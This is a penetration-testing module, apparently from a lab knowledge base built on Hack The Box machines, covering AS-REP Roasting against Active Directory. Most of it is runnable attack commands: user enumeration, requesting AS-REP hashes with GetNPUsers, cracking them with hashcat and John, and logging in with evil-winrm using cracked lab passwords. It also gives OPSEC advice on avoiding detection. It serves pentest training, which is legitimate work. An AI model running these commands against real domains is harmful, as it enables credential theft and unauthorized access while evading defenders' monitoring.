Back to All Modules

AS-REP Roasting

#Overview

AS-REP Roasting targets user accounts that have Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH). The attacker sends an AS-REQ to the Key Distribution Center (KDC) and receives an AS-REP containing encrypted material protected by the user's NTLM hash. The encrypted AS-REP can be cracked offline. This attack requires only a list of valid usernames, making it one of the first attacks tried after user enumeration.

#Prerequisites

  • Network access to the Domain Controller (KDC) on port 88
  • A list of valid domain usernames (from lookupsid, ldapsearch, or OSINT)
  • No domain credentials required

#Detection & Enumeration

#Step 1: Obtain User List

# Method A: RID cycling via lookupsid (if SMB null session or guest access)
# -no-pass: attempt anonymous/guest authentication
# 10000: brute force up to RID 10000 (default is 4000)
lookupsid.py guest@10.10.10.192 -no-pass 10000
lookupsid.py guest@10.10.10.192 -no-pass | grep 'SidTypeUser' | sed 's/.*\\\\\\(.*\\) (SidTypeUser)/\\1/' > users.txt

# Method B: Anonymous LDAP bind + windapsearch
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
# -U: enumerate all user objects
# Anonymous bind tested automatically when no credentials provided

# Method C: Authenticated LDAP (if credentials exist)
ldapsearch -x -H 'ldap://10.10.10.100' -D 'user' -w 'pass' -b "dc=domain,dc=local" \
  "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName

# Method D: netexec user enumeration
netexec smb 10.10.11.35 -u 'guest' -p '' --users
BASH

#Step 2: Identify Pre-Auth Disabled Accounts

# Bulk AS-REP roast against a user list
# -dc-ip: domain controller IP
# -no-pass: no password supplied (anonymous request)
# -usersfile: file containing one username per line
GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.192

# Filter out noise — KDC_ERR_C_PRINCIPAL_UNKNOWN means user doesn't exist
GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.192 | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'

# Request ticket for a specific known user
GetNPUsers.py egotistical-bank.local/fsmith -request -no-pass -dc-ip 10.10.10.175

# Kerberos-authenticated AS-REP roasting (avoids NTLM):
impacket-GetNPUsers domain.local/user:password -request -dc-ip 10.10.10.10
# The -request flag uses Kerberos authentication instead of NTLM
# This avoids NTLM authentication which may be monitored or disabled

# Loop through a list of usernames (one by one)
while read p; do
  GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.10.10.175 >> hash.txt
done < unames.txt
BASH

#Step 3: Common Service Account Naming Patterns

Pre-auth is typically disabled for service accounts that use legacy applications:

  • svc-* (e.g., svc-alfresco, svc_apache)
  • *svc (e.g., SQLSvc, SVC_TGS)
  • Application-specific: alfresco, exchange, sap, oracle
  • Scan results or LDAP enumeration may reveal specific service names

#Exploitation / Execution

#Hash Cracking

# Hashcat — mode 18200 (Kerberos 5 AS-REP etype 23)
hashcat -m 18200 hash.txt -o pass.txt /usr/share/wordlists/rockyou.txt --force
# Mode 18200: AS-REP etype 23 (RC4-HMAC)

# John the Ripper
john hash --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt
# --format=krb5asrep: Kerberos 5 AS-REP for both RC4 and AES tickets

# John with fork for speed
john hash --fork=4 -w=/usr/share/wordlists/rockyou.txt
BASH

#Hash Identification

The output from GetNPUsers looks like:

$krb5asrep$23$svc-alfresco@HTB.LOCAL:fef58ddc72bde86138c79baa53e3f340$9ccf...
TEXT
  • $23$: RFC 3961 encryption type 23 (RC4-HMAC)
  • $18$: AES256-CTS-HMAC-SHA1-96 (John can also crack these)

#Post-Crack Authentication

# Test credentials with various services
netexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
netexec winrm 10.10.10.192 -u svc-alfresco -p 's3rvice'

# WinRM shell
evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'

# Kerberos TGT-based authentication
getTGT.py -dc-ip dc01.htb.local htb.local/svc-alfresco -hashes :<NT_HASH>
export KRB5CCNAME=svc-alfresco.ccache
BASH

#Targeted vs Bulk AS-REP Roasting

ApproachDescriptionOPSEC Impact
BulkRun GetNPUsers against all known usersHigh — generates many 4768 events
TargetedOnly test users likely to have pre-auth disabledLow — fewer requests, less noise
AuthenticatedUse valid creds to query UF_DONT_REQUIRE_PREAUTH via LDAP firstMedium — LDAP query is logged

Authenticated pre-screening:

# Query which users have pre-auth disabled via LDAP
GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
# Look for accounts with specific UAC flags

# Using bloodhound-python, pre-auth disabled users appear in node properties
bloodhound-python -d domain -u user -p pass -dc dc -c all -ns 10.10.10.10
BASH

#Important: impacket-GetNPUsers -no-preauth flag

# Only the ThePorgs fork of impacket supports -no-preauth for pre-auth user enumeration
# Main branch impacket does NOT support this flag
# Install ThePorgs fork: pip install impacket  (current pip version IS ThePorgs fork)
# Verify: impacket-GetNPUsers -h | grep -i preauth
TEXT

#Common Pitfalls

  • Hash not crackable: The password is strong and not in wordlists. Consider longer wordlists, rules, or keyboard walks.
  • All users return KDC_ERR: Kerberos may not be reachable or the domain name is incorrect. Verify with nmap -p88 <DC> and check /etc/hosts.
  • Clock skew: Kerberos requires client clock within 5 minutes of DC clock. Use sudo ntpdate -u <DC> before Kerberos operations.
  • Empty results on valid users: The -usersfile file may contain extra whitespace. Use sed -i 's/ //g' users.txt to clean.

#OPSEC Considerations

  • Each AS-REQ generates Windows Event ID 4768 (Kerberos TGT requested) on the DC
  • Bulk roasting generates many rapid 4768 events — consider throttling or targeted approach
  • Pre-auth disabled is also flagged by tools like PingCastle and Microsoft Defender for Identity
  • After obtaining credentials, prefer using BloodHound for further enumeration rather than noisy LDAP/SMB queries

#Post-Exploitation Value

  • Initial foothold credentials — most common outcome
  • The cracked account may be a service account with elevated privileges (e.g., svc_alfresco in Forest was in Account Operators)
  • Service accounts often have WinRM access for remote management
  • The account can be used for BloodHound ingestion and Kerberoasting

#Cross-References

#Tool References

ToolLink
Impacket (GetNPUsers)https://github.com/fortra/impacket
hashcathttps://hashcat.net/hashcat/
John the Ripperhttps://github.com/openwall/john
windapsearchhttps://github.com/ropnop/windapsearch

#Source Machines

  • Blackfield (Hard) — support user via AS-REP -> bloodhound -> LSASS dump -> Backup Operators -> NTDS dump
  • Forest (Easy) — svc-alfresco via AS-REP -> Account Operators -> Exchange Windows Permissions -> DCSync
  • Sauna (Easy) — fsmith via AS-REP -> WinPEAS autologon -> svc_loanmgr -> DCSync
  • Rebound (Insane) — jjones via AS-REP -> pre-auth Kerberoasting -> ldap_monitor password